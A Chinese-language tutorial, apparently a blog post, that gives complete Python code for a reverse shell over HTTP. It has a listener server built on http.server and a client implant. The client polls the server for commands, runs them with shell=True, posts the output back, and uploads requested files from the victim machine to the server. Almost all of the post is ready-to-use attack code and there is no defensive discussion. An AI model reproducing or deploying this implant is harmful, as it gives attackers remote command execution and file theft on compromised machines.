利用Python3 http.server模块实现基于HTTP协议的反向shell(含命令执行、文件下载）

　　服务器端代码利用http.server内置模块，实现内置的do_GET以及do_POST方法，一定要根据规则给出response以及end_header。

　　同时为了实现文件下载，需要用到cgi模块，用于解析文件参数。

import http.server
import optparse
import sys
import cgi



class MyHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):       
      
        command = input("# ")
        self.send_response(200)
        self.send_header('Content-type','text/html')
        self.end_headers()
        self.wfile.write(command.encode('utf-8'))    
       



    def do_POST(self):   
        if self.path == '/stores':
            try:
                ctype,pdict = cgi.parse_header(self.headers['Content-Type']) 
                if ctype == 'multipart/form-data':
                    fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD':'POST'})
                else:
                    print("Unexpected post requests")
                fs_up =fs['file']
                with open('test.png', 'wb') as o:
                    o.write(fs_up.file.read())
                    self.send_response(200)
                    self.end_headers()
            except Exception as e:
                print(e)
            return 

        self.send_response(200)
        self.end_headers()
        length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(length)     
        print(post_data.decode('utf-8'))

def get_params():
        parser = optparse.OptionParser("Usage: <Program> -p port")
        parser.add_option('-p','--port',dest='port', type='int', help="Specify listener port")
        options,args = parser.parse_args()
        if options.port is None:
            print(parser.usage)
            sys.exit(0)
        if options.port > 65535 or options.port < 0:
            print("Enter valide port")
            sys.exit(0)
        return options.port      

if __name__ == "__main__":
    port = get_params()
    try:
        server = http.server.HTTPServer(("",port),MyHandler)
        server.serve_forever()
    
    except KeyboardInterrupt:
        print("Exit the program")
        server.socket.close()
        

 

　　客户端代码用requests模块实现：

import requests
import subprocess
import optparse
import sys
import time
import os

class HTTPClient:
    def __init__(self) -> None:
        self.target = self.get_params()[0]
        self.port = self.get_params()[1]
        self.url = "http://"+self.target + ":"+str(self.port)
        # print(self.url)
        

    def get_params(self):
        parser = optparse.OptionParser("Usage: <Program> -p port")
        parser.add_option('-p','--port',dest='port', type='int', help="Specify  server port")
        parser.add_option('-t', '--target', dest='target', type='string', help="Specify server IP address")
        options,args = parser.parse_args()
        if options.port is None or options.target is None:
            print(parser.usage)
            sys.exit(0)
      
        return options.target, options.port
    

    def run(self):
        while True:
            cmd = requests.get(self.url).text
            if cmd.strip() == 'q':
                break

            elif cmd[0:8] == 'download':
                file_path = cmd[9:]
                if os.path.exists(file_path):
                    files = {'file':open(file_path,'rb')}
                    r = requests.post(self.url + '/stores',files=files)
                else:
                    r = requests.post(self.url, data="The file does not exist".encode('utf-8'))

            else:
                try:
                    command_result = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT,encoding='GBK')
                except:
                    command_result = "Failed to execute"
                finally:   
                    requests.post(self.url,data=command_result.encode('utf-8'))
                time.sleep(3)


if __name__ == "__main__":
    httpclient = HTTPClient()
    httpclient.run()

 

实现效果如下图所示：